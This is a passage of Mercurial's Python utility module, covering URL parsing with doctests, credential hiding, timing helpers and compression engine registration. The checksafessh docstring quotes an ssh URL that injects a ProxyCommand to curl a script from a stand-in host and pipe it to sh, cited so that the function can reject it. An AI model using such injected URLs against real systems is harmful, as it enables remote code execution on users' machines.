2710 2715 If parsefragment is False, fragment is included in query. If
2711 2716 parsequery is False, query is included in path. If both are
2712 2717 False, both fragment and query are included in path.
2713 2718
2714 2719 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2715 2720
2716 2721 Note that for backward compatibility reasons, bundle URLs do not
2717 2722 take host names. That means 'bundle://../' has a path of '../'.
2718 2723
2719 2724 Examples:
2720 2725
2721 2726 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2722 2727 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2723 2728 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2724 2729 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2725 2730 >>> url(b'file:///home/joe/repo')
2726 2731 <url scheme: 'file', path: '/home/joe/repo'>
2727 2732 >>> url(b'file:///c:/temp/foo/')
2728 2733 <url scheme: 'file', path: 'c:/temp/foo/'>
2729 2734 >>> url(b'bundle:foo')
2730 2735 <url scheme: 'bundle', path: 'foo'>
2731 2736 >>> url(b'bundle://../foo')
2732 2737 <url scheme: 'bundle', path: '../foo'>
2733 2738 >>> url(br'c:\foo\bar')
2734 2739 <url path: 'c:\\foo\\bar'>
2735 2740 >>> url(br'\\blah\blah\blah')
2736 2741 <url path: '\\\\blah\\blah\\blah'>
2737 2742 >>> url(br'\\blah\blah\blah#baz')
2738 2743 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2739 2744 >>> url(br'file:///C:\users\me')
2740 2745 <url scheme: 'file', path: 'C:\\users\\me'>
2741 2746
2742 2747 Authentication credentials:
2743 2748
2744 2749 >>> url(b'ssh://joe:xyz@x/repo')
2745 2750 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2746 2751 >>> url(b'ssh://joe@x/repo')
2747 2752 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2748 2753
2749 2754 Query strings and fragments:
2750 2755
2751 2756 >>> url(b'http://host/a?b#c')
2752 2757 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2753 2758 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2754 2759 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2755 2760
2756 2761 Empty path:
2757 2762
2758 2763 >>> url(b'')
2759 2764 <url path: ''>
2760 2765 >>> url(b'#a')
2761 2766 <url path: '', fragment: 'a'>
2762 2767 >>> url(b'http://host/')
2763 2768 <url scheme: 'http', host: 'host', path: ''>
2764 2769 >>> url(b'http://host/#a')
2765 2770 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2766 2771
2767 2772 Only scheme:
2768 2773
2769 2774 >>> url(b'http:')
2770 2775 <url scheme: 'http'>
2771 2776 """
2772 2777
2773 2778 _safechars = "!~*'()+"
2774 2779 _safepchars = "/!~*'()+:\\"
2775 2780 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2776 2781
2777 2782 def __init__(self, path, parsequery=True, parsefragment=True):
2778 2783 # We slowly chomp away at path until we have only the path left
2779 2784 self.scheme = self.user = self.passwd = self.host = None
2780 2785 self.port = self.path = self.query = self.fragment = None
2781 2786 self._localpath = True
2782 2787 self._hostport = ''
2783 2788 self._origpath = path
2784 2789
2785 2790 if parsefragment and '#' in path:
2786 2791 path, self.fragment = path.split('#', 1)
2787 2792
2788 2793 # special case for Windows drive letters and UNC paths
2789 2794 if hasdriveletter(path) or path.startswith('\\\\'):
2790 2795 self.path = path
2791 2796 return
2792 2797
2793 2798 # For compatibility reasons, we can't handle bundle paths as
2794 2799 # normal URLS
2795 2800 if path.startswith('bundle:'):
2796 2801 self.scheme = 'bundle'
2797 2802 path = path[7:]
2798 2803 if path.startswith('//'):
2799 2804 path = path[2:]
2800 2805 self.path = path
2801 2806 return
2802 2807
2803 2808 if self._matchscheme(path):
2804 2809 parts = path.split(':', 1)
2805 2810 if parts[0]:
2806 2811 self.scheme, path = parts
2807 2812 self._localpath = False
2808 2813
2809 2814 if not path:
2810 2815 path = None
2811 2816 if self._localpath:
2812 2817 self.path = ''
2813 2818 return
2814 2819 else:
2815 2820 if self._localpath:
2816 2821 self.path = path
2817 2822 return
2818 2823
2819 2824 if parsequery and '?' in path:
2820 2825 path, self.query = path.split('?', 1)
2821 2826 if not path:
2822 2827 path = None
2823 2828 if not self.query:
2824 2829 self.query = None
2825 2830
2826 2831 # // is required to specify a host/authority
2827 2832 if path and path.startswith('//'):
2828 2833 parts = path[2:].split('/', 1)
2829 2834 if len(parts) > 1:
2830 2835 self.host, path = parts
2831 2836 else:
2832 2837 self.host = parts[0]
2833 2838 path = None
2834 2839 if not self.host:
2835 2840 self.host = None
2836 2841 # path of file:///d is /d
2837 2842 # path of file:///d:/ is d:/, not /d:/
2838 2843 if path and not hasdriveletter(path):
2839 2844 path = '/' + path
2840 2845
2841 2846 if self.host and '@' in self.host:
2842 2847 self.user, self.host = self.host.rsplit('@', 1)
2843 2848 if ':' in self.user:
2844 2849 self.user, self.passwd = self.user.split(':', 1)
2845 2850 if not self.host:
2846 2851 self.host = None
2847 2852
2848 2853 # Don't split on colons in IPv6 addresses without ports
2849 2854 if (self.host and ':' in self.host and
2850 2855 not (self.host.startswith('[') and self.host.endswith(']'))):
2851 2856 self._hostport = self.host
2852 2857 self.host, self.port = self.host.rsplit(':', 1)
2853 2858 if not self.host:
2854 2859 self.host = None
2855 2860
2856 2861 if (self.host and self.scheme == 'file' and
2857 2862 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2858 2863 raise Abort(_('file:// URLs can only refer to localhost'))
2859 2864
2860 2865 self.path = path
2861 2866
2862 2867 # leave the query string escaped
2863 2868 for a in ('user', 'passwd', 'host', 'port',
2864 2869 'path', 'fragment'):
2865 2870 v = getattr(self, a)
2866 2871 if v is not None:
2867 2872 setattr(self, a, urlreq.unquote(v))
2868 2873
2869 2874 @encoding.strmethod
2870 2875 def __repr__(self):
2871 2876 attrs = []
2872 2877 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2873 2878 'query', 'fragment'):
2874 2879 v = getattr(self, a)
2875 2880 if v is not None:
2876 2881 attrs.append('%s: %r' % (a, v))
2877 2882 return '<url %s>' % ', '.join(attrs)
2878 2883
2879 2884 def __bytes__(self):
2880 2885 r"""Join the URL's components back into a URL string.
2881 2886
2882 2887 Examples:
2883 2888
2884 2889 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2885 2890 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2886 2891 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2887 2892 'http://user:pw@host:80/?foo=bar&baz=42'
2888 2893 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2889 2894 'http://user:pw@host:80/?foo=bar%3dbaz'
2890 2895 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2891 2896 'ssh://user:pw@[::1]:2200//home/joe#'
2892 2897 >>> bytes(url(b'http://localhost:80//'))
2893 2898 'http://localhost:80//'
2894 2899 >>> bytes(url(b'http://localhost:80/'))
2895 2900 'http://localhost:80/'
2896 2901 >>> bytes(url(b'http://localhost:80'))
2897 2902 'http://localhost:80/'
2898 2903 >>> bytes(url(b'bundle:foo'))
2899 2904 'bundle:foo'
2900 2905 >>> bytes(url(b'bundle://../foo'))
2901 2906 'bundle:../foo'
2902 2907 >>> bytes(url(b'path'))
2903 2908 'path'
2904 2909 >>> bytes(url(b'file:///tmp/foo/bar'))
2905 2910 'file:///tmp/foo/bar'
2906 2911 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2907 2912 'file:///c:/tmp/foo/bar'
2908 2913 >>> print(url(br'bundle:foo\bar'))
2909 2914 bundle:foo\bar
2910 2915 >>> print(url(br'file:///D:\data\hg'))
2911 2916 file:///D:\data\hg
2912 2917 """
2913 2918 if self._localpath:
2914 2919 s = self.path
2915 2920 if self.scheme == 'bundle':
2916 2921 s = 'bundle:' + s
2917 2922 if self.fragment:
2918 2923 s += '#' + self.fragment
2919 2924 return s
2920 2925
2921 2926 s = self.scheme + ':'
2922 2927 if self.user or self.passwd or self.host:
2923 2928 s += '//'
2924 2929 elif self.scheme and (not self.path or self.path.startswith('/')
2925 2930 or hasdriveletter(self.path)):
2926 2931 s += '//'
2927 2932 if hasdriveletter(self.path):
2928 2933 s += '/'
2929 2934 if self.user:
2930 2935 s += urlreq.quote(self.user, safe=self._safechars)
2931 2936 if self.passwd:
2932 2937 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2933 2938 if self.user or self.passwd:
2934 2939 s += '@'
2935 2940 if self.host:
2936 2941 if not (self.host.startswith('[') and self.host.endswith(']')):
2937 2942 s += urlreq.quote(self.host)
2938 2943 else:
2939 2944 s += self.host
2940 2945 if self.port:
2941 2946 s += ':' + urlreq.quote(self.port)
2942 2947 if self.host:
2943 2948 s += '/'
2944 2949 if self.path:
2945 2950 # TODO: similar to the query string, we should not unescape the
2946 2951 # path when we store it, the path might contain '%2f' = '/',
2947 2952 # which we should *not* escape.
2948 2953 s += urlreq.quote(self.path, safe=self._safepchars)
2949 2954 if self.query:
2950 2955 # we store the query in escaped form.
2951 2956 s += '?' + self.query
2952 2957 if self.fragment is not None:
2953 2958 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2954 2959 return s
2955 2960
2956 2961 __str__ = encoding.strmethod(__bytes__)
2957 2962
2958 2963 def authinfo(self):
2959 2964 user, passwd = self.user, self.passwd
2960 2965 try:
2961 2966 self.user, self.passwd = None, None
2962 2967 s = bytes(self)
2963 2968 finally:
2964 2969 self.user, self.passwd = user, passwd
2965 2970 if not self.user:
2966 2971 return (s, None)
2967 2972 # authinfo[1] is passed to urllib2 password manager, and its
2968 2973 # URIs must not contain credentials. The host is passed in the
2969 2974 # URIs list because Python < 2.4.3 uses only that to search for
2970 2975 # a password.
2971 2976 return (s, (None, (s, self.host),
2972 2977 self.user, self.passwd or ''))
2973 2978
2974 2979 def isabs(self):
2975 2980 if self.scheme and self.scheme != 'file':
2976 2981 return True # remote URL
2977 2982 if hasdriveletter(self.path):
2978 2983 return True # absolute for our purposes - can't be joined()
2979 2984 if self.path.startswith(br'\\'):
2980 2985 return True # Windows UNC path
2981 2986 if self.path.startswith('/'):
2982 2987 return True # POSIX-style
2983 2988 return False
2984 2989
2985 2990 def localpath(self):
2986 2991 if self.scheme == 'file' or self.scheme == 'bundle':
2987 2992 path = self.path or '/'
2988 2993 # For Windows, we need to promote hosts containing drive
2989 2994 # letters to paths with drive letters.
2990 2995 if hasdriveletter(self._hostport):
2991 2996 path = self._hostport + '/' + self.path
2992 2997 elif (self.host is not None and self.path
2993 2998 and not hasdriveletter(path)):
2994 2999 path = '/' + path
2995 3000 return path
2996 3001 return self._origpath
2997 3002
2998 3003 def islocal(self):
2999 3004 '''whether localpath will return something that posixfile can open'''
3000 3005 return (not self.scheme or self.scheme == 'file'
3001 3006 or self.scheme == 'bundle')
3002 3007
3003 3008 def hasscheme(path):
3004 3009 return bool(url(path).scheme)
3005 3010
3006 3011 def hasdriveletter(path):
3007 3012 return path and path[1:2] == ':' and path[0:1].isalpha()
3008 3013
3009 3014 def urllocalpath(path):
3010 3015 return url(path, parsequery=False, parsefragment=False).localpath()
3011 3016
3012 3017 def checksafessh(path):
3013 3018 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3014 3019
3015 3020 This is a sanity check for ssh urls. ssh will parse the first item as
3016 3021 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3017 3022 Let's prevent these potentially exploited urls entirely and warn the
3018 3023 user.
3019 3024
3020 3025 Raises an error.Abort when the url is unsafe.
3021 3026 """
3022 3027 path = urlreq.unquote(path)
3023 3028 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3024 3029 raise error.Abort(_('potentially unsafe url: %r') %
3025 3030 (path,))
3026 3031
3027 3032 def hidepassword(u):
3028 3033 '''hide user credential in a url string'''
3029 3034 u = url(u)
3030 3035 if u.passwd:
3031 3036 u.passwd = '***'
3032 3037 return bytes(u)
3033 3038
3034 3039 def removeauth(u):
3035 3040 '''remove all authentication information from a url string'''
3036 3041 u = url(u)
3037 3042 u.user = u.passwd = None
3038 3043 return str(u)
3039 3044
3040 3045 timecount = unitcountfn(
3041 3046 (1, 1e3, _('%.0f s')),
3042 3047 (100, 1, _('%.1f s')),
3043 3048 (10, 1, _('%.2f s')),
3044 3049 (1, 1, _('%.3f s')),
3045 3050 (100, 0.001, _('%.1f ms')),
3046 3051 (10, 0.001, _('%.2f ms')),
3047 3052 (1, 0.001, _('%.3f ms')),
3048 3053 (100, 0.000001, _('%.1f us')),
3049 3054 (10, 0.000001, _('%.2f us')),
3050 3055 (1, 0.000001, _('%.3f us')),
3051 3056 (100, 0.000000001, _('%.1f ns')),
3052 3057 (10, 0.000000001, _('%.2f ns')),
3053 3058 (1, 0.000000001, _('%.3f ns')),
3054 3059 )
3055 3060
3056 3061 _timenesting = [0]
3057 3062
3058 3063 def timed(func):
3059 3064 '''Report the execution time of a function call to stderr.
3060 3065
3061 3066 During development, use as a decorator when you need to measure
3062 3067 the cost of a function, e.g. as follows:
3063 3068
3064 3069 @util.timed
3065 3070 def foo(a, b, c):
3066 3071 pass
3067 3072 '''
3068 3073
3069 3074 def wrapper(*args, **kwargs):
3070 3075 start = timer()
3071 3076 indent = 2
3072 3077 _timenesting[0] += indent
3073 3078 try:
3074 3079 return func(*args, **kwargs)
3075 3080 finally:
3076 3081 elapsed = timer() - start
3077 3082 _timenesting[0] -= indent
3078 3083 stderr.write('%s%s: %s\n' %
3079 3084 (' ' * _timenesting[0], func.__name__,
3080 3085 timecount(elapsed)))
3081 3086 return wrapper
3082 3087
3083 3088 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3084 3089 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3085 3090
3086 3091 def sizetoint(s):
3087 3092 '''Convert a space specifier to a byte count.
3088 3093
3089 3094 >>> sizetoint(b'30')
3090 3095 30
3091 3096 >>> sizetoint(b'2.2kb')
3092 3097 2252
3093 3098 >>> sizetoint(b'6M')
3094 3099 6291456
3095 3100 '''
3096 3101 t = s.strip().lower()
3097 3102 try:
3098 3103 for k, u in _sizeunits:
3099 3104 if t.endswith(k):
3100 3105 return int(float(t[:-len(k)]) * u)
3101 3106 return int(t)
3102 3107 except ValueError:
3103 3108 raise error.ParseError(_("couldn't parse size: %s") % s)
3104 3109
3105 3110 class hooks(object):
3106 3111 '''A collection of hook functions that can be used to extend a
3107 3112 function's behavior. Hooks are called in lexicographic order,
3108 3113 based on the names of their sources.'''
3109 3114
3110 3115 def __init__(self):
3111 3116 self._hooks = []
3112 3117
3113 3118 def add(self, source, hook):
3114 3119 self._hooks.append((source, hook))
3115 3120
3116 3121 def __call__(self, *args):
3117 3122 self._hooks.sort(key=lambda x: x[0])
3118 3123 results = []
3119 3124 for source, hook in self._hooks:
3120 3125 results.append(hook(*args))
3121 3126 return results
3122 3127
3123 3128 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3124 3129 '''Yields lines for a nicely formatted stacktrace.
3125 3130 Skips the 'skip' last entries, then return the last 'depth' entries.
3126 3131 Each file+linenumber is formatted according to fileline.
3127 3132 Each line is formatted according to line.
3128 3133 If line is None, it yields:
3129 3134 length of longest filepath+line number,
3130 3135 filepath+linenumber,
3131 3136 function
3132 3137
3133 3138 Not be used in production code but very convenient while developing.
3134 3139 '''
3135 3140 entries = [(fileline % (fn, ln), func)
3136 3141 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3137 3142 ][-depth:]
3138 3143 if entries:
3139 3144 fnmax = max(len(entry[0]) for entry in entries)
3140 3145 for fnln, func in entries:
3141 3146 if line is None:
3142 3147 yield (fnmax, fnln, func)
3143 3148 else:
3144 3149 yield line % (fnmax, fnln, func)
3145 3150
3146 3151 def debugstacktrace(msg='stacktrace', skip=0,
3147 3152 f=stderr, otherf=stdout, depth=0):
3148 3153 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3149 3154 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3150 3155 By default it will flush stdout first.
3151 3156 It can be used everywhere and intentionally does not require an ui object.
3152 3157 Not be used in production code but very convenient while developing.
3153 3158 '''
3154 3159 if otherf:
3155 3160 otherf.flush()
3156 3161 f.write('%s at:\n' % msg.rstrip())
3157 3162 for line in getstackframes(skip + 1, depth=depth):
3158 3163 f.write(line)
3159 3164 f.flush()
3160 3165
3161 3166 class dirs(object):
3162 3167 '''a multiset of directory names from a dirstate or manifest'''
3163 3168
3164 3169 def __init__(self, map, skip=None):
3165 3170 self._dirs = {}
3166 3171 addpath = self.addpath
3167 3172 if safehasattr(map, 'iteritems') and skip is not None:
3168 3173 for f, s in map.iteritems():
3169 3174 if s[0] != skip:
3170 3175 addpath(f)
3171 3176 else:
3172 3177 for f in map:
3173 3178 addpath(f)
3174 3179
3175 3180 def addpath(self, path):
3176 3181 dirs = self._dirs
3177 3182 for base in finddirs(path):
3178 3183 if base in dirs:
3179 3184 dirs[base] += 1
3180 3185 return
3181 3186 dirs[base] = 1
3182 3187
3183 3188 def delpath(self, path):
3184 3189 dirs = self._dirs
3185 3190 for base in finddirs(path):
3186 3191 if dirs[base] > 1:
3187 3192 dirs[base] -= 1
3188 3193 return
3189 3194 del dirs[base]
3190 3195
3191 3196 def __iter__(self):
3192 3197 return iter(self._dirs)
3193 3198
3194 3199 def __contains__(self, d):
3195 3200 return d in self._dirs
3196 3201
3197 3202 if safehasattr(parsers, 'dirs'):
3198 3203 dirs = parsers.dirs
3199 3204
3200 3205 def finddirs(path):
3201 3206 pos = path.rfind('/')
3202 3207 while pos != -1:
3203 3208 yield path[:pos]
3204 3209 pos = path.rfind('/', 0, pos)
3205 3210
3206 3211 # compression code
3207 3212
3208 3213 SERVERROLE = 'server'
3209 3214 CLIENTROLE = 'client'
3210 3215
3211 3216 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3212 3217 (u'name', u'serverpriority',
3213 3218 u'clientpriority'))
3214 3219
3215 3220 class compressormanager(object):
3216 3221 """Holds registrations of various compression engines.
3217 3222
3218 3223 This class essentially abstracts the differences between compression
3219 3224 engines to allow new compression formats to be added easily, possibly from
3220 3225 extensions.
3221 3226
3222 3227 Compressors are registered against the global instance by calling its
3223 3228 ``register()`` method.
3224 3229 """
3225 3230 def __init__(self):
3226 3231 self._engines = {}
3227 3232 # Bundle spec human name to engine name.
3228 3233 self._bundlenames = {}
3229 3234 # Internal bundle identifier to engine name.
3230 3235 self._bundletypes = {}
3231 3236 # Revlog header to engine name.
3232 3237 self._revlogheaders = {}
3233 3238 # Wire proto identifier to engine name.
3234 3239 self._wiretypes = {}
3235 3240
3236 3241 def __getitem__(self, key):
3237 3242 return self._engines[key]
3238 3243
3239 3244 def __contains__(self, key):
3240 3245 return key in self._engines
3241 3246
3242 3247 def __iter__(self):
3243 3248 return iter(self._engines.keys())
3244 3249
3245 3250 def register(self, engine):
3246 3251 """Register a compression engine with the manager.
3247 3252
3248 3253 The argument must be a ``compressionengine`` instance.
3249 3254 """
3250 3255 if not isinstance(engine, compressionengine):
3251 3256 raise ValueError(_('argument must be a compressionengine'))
3252 3257
3253 3258 name = engine.name()
3254 3259
3255 3260 if name in self._engines:
3256 3261 raise error.Abort(_('compression engine %s already registered') %
3257 3262 name)
3258 3263
3259 3264 bundleinfo = engine.bundletype()
3260 3265 if bundleinfo:
3261 3266 bundlename, bundletype = bundleinfo
3262 3267
3263 3268 if bundlename in self._bundlenames:
3264 3269 raise error.Abort(_('bundle name %s already registered') %
3265 3270 bundlename)
3266 3271 if bundletype in self._bundletypes:
3267 3272 raise error.Abort(_('bundle type %s already registered by %s') %
3268 3273 (bundletype, self._bundletypes[bundletype]))
3269 3274
3270 3275 # No external facing name declared.
3271 3276 if bundlename:
3272 3277 self._bundlenames[bundlename] = name
3273 3278
3274 3279 self._bundletypes[bundletype] = name
3275 3280
3276 3281 wiresupport = engine.wireprotosupport()
3277 3282 if wiresupport:
3278 3283 wiretype = wiresupport.name
3279 3284 if wiretype in self._wiretypes:
3280 3285 raise error.Abort(_('wire protocol compression %s already '
3281 3286 'registered by %s') %
3282 3287 (wiretype, self._wiretypes[wiretype]))
3283 3288
3284 3289 self._wiretypes[wiretype] = name
3285 3290
3286 3291 revlogheader = engine.revlogheader()
3287 3292 if revlogheader and revlogheader in self._revlogheaders:
3288 3293 raise error.Abort(_('revlog header %s already registered by %s') %
3289 3294 (revlogheader, self._revlogheaders[revlogheader]))
3290 3295
3291 3296 if revlogheader:
3292 3297 self._revlogheaders[revlogheader] = name
3293 3298
3294 3299 self._engines[name] = engine
3295 3300
3296 3301 @property
3297 3302 def supportedbundlenames(self):
3298 3303 return set(self._bundlenames.keys())
3299 3304
3300 3305 @property
3301 3306 def supportedbundletypes(self):
3302 3307 return set(self._bundletypes.keys())
3303 3308
3304 3309 def forbundlename(self, bundlename):
3305 3310 """Obtain a compression engine registered to a bundle name.
3306 3311
3307 3312 Will raise KeyError if the bundle type isn't registered.
3308 3313
3309 3314 Will abort if the engine is known but not available.
3310 3315 """
3311 3316 engine = self._engines[self._bundlenames[bundlename]]
3312 3317 if not engine.available():
3313 3318 raise error.Abort(_('compression engine %s could not be loaded') %
3314 3319 engine.name())
3315 3320 return engine
3316 3321
3317 3322 def forbundletype(self, bundletype):
3318 3323 """Obtain a compression engine registered to a bundle type.
3319 3324
3320 3325 Will raise KeyError if the bundle type isn't registered.
3321 3326
3322 3327 Will abort if the engine is known but not available.
3323 3328 """
3324 3329 engine = self._engines[self._bundletypes[bundletype]]
3325 3330 if not engine.available():
3326 3331 raise error.Abort(_('compression engine %s could not be loaded') %
3327 3332 engine.name())
3328 3333 return engine
3329 3334
3330 3335 def supportedwireengines(self, role, onlyavailable=True):
3331 3336 """Obtain compression engines that support the wire protocol.
3332 3337
3333 3338 Returns a list of engines in prioritized order, most desired first.
3334 3339
3335 3340 If ``onlyavailable`` is set, filter out engines that can't be
3336 3341 loaded.
3337 3342 """
3338 3343 assert role in (SERVERROLE, CLIENTROLE)
3339 3344
3340 3345 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3341 3346
3342 3347 engines = [self._engines[e] for e in self._wiretypes.values()]
3343 3348 if onlyavailable:
3344 3349 engines = [e for e in engines if e.available()]
3345 3350
3346 3351 def getkey(e):
3347 3352 # Sort first by priority, highest first. In case of tie, sort
3348 3353 # alphabetically. This is arbitrary, but ensures output is
3349 3354 # stable.
3350 3355 w = e.wireprotosupport()
3351 3356 return -1 * getattr(w, attr), w.name
3352 3357
3353 3358 return list(sorted(engines, key=getkey))
3354 3359
3355 3360 def forwiretype(self, wiretype):
3356 3361 engine = self._engines[self._wiretypes[wiretype]]
3357 3362 if not engine.available():
3358 3363 raise error.Abort(_('compression engine %s could not be loaded') %
3359 3364 engine.name())
3360 3365 return engine
3361 3366
3362 3367 def forrevlogheader(self, header):
3363 3368 """Obtain a compression engine registered to a revlog header.
3364 3369
3365 3370 Will raise KeyError if the revlog header value isn't registered.
3366 3371 """
3367 3372 return self._engines[self._revlogheaders[header]]
3368 3373
3369 3374 compengines = compressormanager()
3370 3375
3371 3376 class compressionengine(object):
3372 3377 """Base class for compression engines.
3373 3378
3374 3379 Compression engines must implement the interface defined by this class.
3375 3380 """
3376 3381 def name(self):
3377 3382 """Returns the name of the compression engine.
3378 3383
3379 3384 This is the key the engine is registered under.
3380 3385
3381 3386 This method must be implemented.
3382 3387 """
3383 3388 raise NotImplementedError()
3384 3389
3385 3390 def available(self):
3386 3391 """Whether the compression engine is available.
3387 3392
3388 3393 The intent of this method is to allow optional compression engines
3389 3394 that may not be available in all installations (such as engines relying
3390 3395 on C extensions that may not be present).
3391 3396 """
3392 3397 return True
3393 3398
3394 3399 def bundletype(self):
3395 3400 """Describes bundle identifiers for this engine.
3396 3401
3397 3402 If this compression engine isn't supported for bundles, returns None.
3398 3403
3399 3404 If this engine can be used for bundles, returns a 2-tuple of strings of
3400 3405 the user-facing "bundle spec" compression name and an internal
3401 3406 identifier used to denote the compression format within bundles. To
3402 3407 exclude the name from external usage, set the first element to ``None``.
3403 3408
3404 3409 If bundle compression is supported, the class must also implement
3405 3410 ``compressstream`` and `decompressorreader``.
3406 3411
3407 3412 The docstring of this method is used in the help system to tell users
3408 3413 about this engine.
3409 3414 """
3410 3415 return None
3411 3416
3412 3417 def wireprotosupport(self):
3413 3418 """Declare support for this compression format on the wire protocol.
3414 3419
3415 3420 If this compression engine isn't supported for compressing wire
3416 3421 protocol payloads, returns None.
3417 3422
3418 3423 Otherwise, returns ``compenginewireprotosupport`` with the following
3419 3424 fields:
3420 3425
3421 3426 * String format identifier
3422 3427 * Integer priority for the server
3423 3428 * Integer priority for the client
3424 3429
3425 3430 The integer priorities are used to order the advertisement of format
3426 3431 support by server and client. The highest integer is advertised
3427 3432 first. Integers with non-positive values aren't advertised.
3428 3433
3429 3434 The priority values are somewhat arbitrary and only used for default
3430 3435 ordering. The relative order can be changed via config options.
3431 3436
3432 3437 If wire protocol compression is supported, the class must also implement
3433 3438 ``compressstream`` and ``decompressorreader``.
3434 3439 """
3435 3440 return None
3436 3441
3437 3442 def revlogheader(self):
3438 3443 """Header added to revlog chunks that identifies this engine.
3439 3444
3440 3445 If this engine can be used to compress revlogs, this method should
3441 3446 return the bytes used to identify chunks compressed with this engine.
3442 3447 Else, the method should return ``None`` to indicate it does not
3443 3448 participate in revlog compression.
3444 3449 """
3445 3450 return None
3446 3451
3447 3452 def compressstream(self, it, opts=None):
3448 3453 """Compress an iterator of chunks.
3449 3454
3450 3455 The method receives an iterator (ideally a generator) of chunks of
3451 3456 bytes to be compressed. It returns an iterator (ideally a generator)
3452 3457 of bytes of chunks representing the compressed output.
3453 3458
3454 3459 Optionally accepts an argument defining how to perform compression.
3455 3460 Each engine treats this argument differently.
3456 3461 """
3457 3462 raise NotImplementedError()
3458 3463
3459 3464 def decompressorreader(self, fh):
3460 3465 """Perform decompression on a file object.
3461 3466
3462 3467 Argument is an object with a ``read(size)`` method that returns
3463 3468 compressed data. Return value is an object with a ``read(size)`` that
3464 3469 returns uncompressed data.
3465 3470 """
3466 3471 raise NotImplementedError()
3467 3472
3468 3473 def revlogcompressor(self, opts=None):
3469 3474 """Obtain an object that can be used to compress revlog entries.
3470 3475
3471 3476 The object has a ``compress(data)`` method that compresses binary
3472 3477 data. This method returns compressed binary data or ``None`` if
3473 3478 the data could not be compressed (too small, not compressible, etc).
3474 3479 The returned data should have a header uniquely identifying this
3475 3480 compression format so decompression can be routed to this engine.
3476 3481 This header should be identified by the ``revlogheader()`` return
3477 3482 value.
3478 3483
3479 3484 The object has a ``decompress(data)`` method that decompresses
3480 3485 data. The method will only be called if ``data`` begins with
3481 3486 ``revlogheader()``. The method should return the raw, uncompressed
3482 3487 data or raise a ``RevlogError``.
3483 3488
3484 3489 The object is reusable but is not thread safe.
3485 3490 """
3486 3491 raise NotImplementedError()
3487 3492
3488 3493 class _zlibengine(compressionengine):
3489 3494 def name(self):
3490 3495 return 'zlib'
3491 3496
3492 3497 def bundletype(self):
3493 3498 """zlib compression using the DEFLATE algorithm.
3494 3499
3495 3500 All Mercurial clients should support this format. The compression
3496 3501 algorithm strikes a reasonable balance between compression ratio
3497 3502 and size.
3498 3503 """
3499 3504 return 'gzip', 'GZ'
3500 3505
3501 3506 def wireprotosupport(self):
3502 3507 return compewireprotosupport('zlib', 20, 20)
3503 3508
3504 3509 def revlogheader(self):
3505 3510 return 'x'
3506 3511
3507 3512 def compressstream(self, it, opts=None):
3508 3513 opts = opts or {}
3509 3514
3510 3515 z = zlib.compressobj(opts.get('level', -1))
3511 3516 for chunk in it:
3512 3517 data = z.compress(chunk)
3513 3518 # Not all calls to compress emit data. It is cheaper to inspect
3514 3519 # here than to feed empty chunks through generator.
3515 3520 if data:
3516 3521 yield data
3517 3522
3518 3523 yield z.flush()
3519 3524
3520 3525 def decompressorreader(self, fh):
3521 3526 def gen():
3522 3527 d = zlib.decompressobj()
3523 3528 for chunk in filechunkiter(fh):
3524 3529 while chunk:
3525 3530 # Limit output size to limit memory.
3526 3531 yield d.decompress(chunk, 2 ** 18)
3527 3532 chunk = d.unconsumed_tail
3528 3533
3529 3534 return chunkbuffer(gen())
3530 3535
3531 3536 class zlibrevlogcompressor(object):
3532 3537 def compress(self, data):
3533 3538 insize = len(data)
3534 3539 # Caller handles empty input case.
3535 3540 assert insize > 0
3536 3541
3537 3542 if insize < 44:
3538 3543 return None
3539 3544
3540 3545 elif insize <= 1000000:
3541 3546 compressed = zlib.compress(data)
3542 3547 if len(compressed) < insize:
3543 3548 return compressed
3544 3549 return None
3545 3550
3546 3551 # zlib makes an internal copy of the input buffer, doubling
3547 3552 # memory usage for large inputs. So do streaming compression
3548 3553 # on large inputs.
3549 3554 else:
3550 3555 z = zlib.compressobj()
3551 3556 parts = []
3552 3557 pos = 0
3553 3558 while pos < insize:
3554 3559 pos2 = pos + 2**20
3555 3560 parts.append(z.compress(data[pos:pos2]))
3556 3561 pos = pos2
3557 3562 parts.append(z.flush())
3558 3563
3559 3564 if sum(map(len, parts)) < insize:
3560 3565 return ''.join(parts)
3561 3566 return None
3562 3567
3563 3568 def decompress(self, data):
3564 3569 try:
3565 3570 return zlib.decompress(data)
3566 3571 except zlib.error as e:
3567 3572 raise error.RevlogError(_('revlog decompress error: %s') %
3568 3573 str(e))
3569 3574
3570 3575 def revlogcompressor(self, opts=None):
3571 3576 return self.zlibrevlogcompressor()
3572 3577
